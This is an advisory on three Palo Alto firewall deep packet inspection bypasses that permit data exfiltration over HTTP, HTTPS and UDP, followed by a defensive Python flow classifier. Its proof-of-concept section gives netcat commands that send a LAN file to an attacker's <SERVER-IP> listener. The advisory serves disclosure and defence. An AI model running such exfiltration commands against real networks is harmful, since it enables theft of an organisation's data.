=============================================================================================================================================
| # Title : Palo Alto Deep Packet Inspection (DPI) Critical Vulnerabilities in Mechanism |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.paloaltonetworks.com/network-security/pan-os |
=============================================================================================================================================
POC :
[+] Summary
3 vulnerabilities in Palo Alto Deep Packet Inspection mechanism
Advisory URL: https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt
Blog URL: https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html
[+] :: Product Description ::
------------------------------------------------------------
Palo Alto's Next-Generation Firewalls provide advanced packet inspection technologies including Deep Packet Inspection (DPI).
They use App-ID technology to identify applications even when they attempt to evade detection through masquerading, port hopping, or encryption.
------------------------------------------------------------
[+] :: Vulnerability Summary ::
------------------------------------------------------------
Vulnerable versions: **All Palo Alto firewall versions**.
Versions tested (November 2024):
- PanOS 10.2.8: vulnerable
- PanOS 10.2.9-h1: vulnerable
- PanOS 11.1.4: vulnerable
- PanOS 11.2.0: vulnerable
[+] Three main vulnerabilities:
1. **Exfiltration of data via TCP/80 using "service-http"**
2. **Exfiltration of data via TCP/443 using "service-https"**
3. **Exfiltration of data via UDP to any port and any IP**
- Includes PoC: client.py and server.py
[+] :: Impact ::
------------------------------------------------------------
An attacker within the LAN can:
- Bypass Deep Packet Inspection
- Exfiltrate sensitive data to any external IP using HTTP, HTTPS, or UDP, without any filtering or blocking
This makes networks relying solely on DPI rules **highly vulnerable to data exfiltration attacks**.
------------------------------------------------------------
[+] :: Recommendations ::
------------------------------------------------------------
- Do not use DPI rules without specifying destination IP ranges.
- Always define IPv4/IPv6 ranges of allowed remote services.
- Use Palo Alto EDL when possible.
- Do not rely solely on App-ID to classify sensitive applications.
------------------------------------------------------------
[+] :: PoC Summary ::
------------------------------------------------------------
**Server (attacker on WAN), listening on port 80:**
for i in $(seq 1 10); do nc -l -v -p 80 > exfiltration-http-$i; sleep 1; done
**Client (inside LAN), sending random data:**
for i in $(seq 1 10); do nc -v <SERVER-IP> 80 < rand.hex; sleep 1.5; done
**Verification:**
sha256sum exfiltration-http-*
All received files match the original hash, confirming successful data exfiltration through the firewall.
------------------------------------------------------------
[+] :: Full Attack Execution (Working PoC) ::
------------------------------------------------------------
1. On the attacker/server side:
nc -l -v -p 80 > exfil-file
2. On the victim/client side inside LAN:
nc -v <SERVER-IP> 80 < file-to-exfiltrate.bin
3. The server receives the data despite DPI rules.
------------------------------------------------------------
[+] :: Conclusion ::
------------------------------------------------------------
The Deep Packet Inspection system in Palo Alto firewalls can be fully bypassed to leak data via HTTP/HTTPS/UDP without filtering.
Because the engine allows up to 256 KB before blocking, attackers can exfiltrate massive amounts of information.
**All networks relying solely on App-ID or DPI without strict IP-based rules are at severe risk of data exfiltration.**
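The evasion described above works because raw bytes on TCP/80 are accepted for a long time (up to 256 KB, per this advisory) before the engine decides the flow is not HTTP. A defender reviewing captures or flow data can apply a much tighter budget. The classifier below is an added example, not code from the advisory or from Palo Alto; the 4096-byte budget, the `FlowClassifier` name and the sample flows are constructed for illustration.

```python
import re

# An HTTP/1.x request line, e.g. b"GET /index.html HTTP/1.1\r\n".
REQUEST_LINE = re.compile(rb"^[A-Z]{3,10} \S+ HTTP/\d\.\d\r?\n")

# Constructed budget: bytes a flow to a service-http port may carry before
# we demand a positive HTTP match. Far below the ~256 KB the advisory
# reports the firewall tolerating before it blocks.
MAX_UNIDENTIFIED_BYTES = 4096


class FlowClassifier:
    """Tracks one client-to-server TCP flow on a service-http port and
    decides whether it looks like HTTP or like raw data riding the port."""

    def __init__(self, max_unidentified=MAX_UNIDENTIFIED_BYTES):
        self.max_unidentified = max_unidentified
        self.head = b""        # first bytes of the flow, capped
        self.seen = 0          # total client bytes observed
        self.verdict = "unknown"

    def feed(self, data: bytes) -> str:
        if self.verdict != "unknown":
            return self.verdict
        self.seen += len(data)
        room = self.max_unidentified - len(self.head)
        if room > 0:
            self.head += data[:room]
        if REQUEST_LINE.match(self.head):
            self.verdict = "http"
        elif b"\n" in self.head or self.seen > self.max_unidentified:
            # First line finished without an HTTP request line, or the
            # budget ran out with no identification: flag the flow.
            self.verdict = "alert-unidentified"
        return self.verdict


def classify(chunks, max_unidentified=MAX_UNIDENTIFIED_BYTES) -> str:
    """Run every chunk of a flow through the classifier; returns
    'http', 'alert-unidentified' or 'unknown' (not enough data yet)."""
    c = FlowClassifier(max_unidentified)
    for chunk in chunks:
        if c.feed(chunk) != "unknown":
            break
    return c.verdict


if __name__ == "__main__":
    # Constructed flows: a real request and a hex blob like rand.hex.
    print(classify([b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"]))
    print(classify([b"0badc0de" * 8 + b"\n"]))
```

A flow that reaches the byte budget or completes its first line without an HTTP request line is reported as unidentified data on port 80, which is the signal the firewall rules in the advisory fail to act on.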
===================================================================================================
Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
===================================================================================================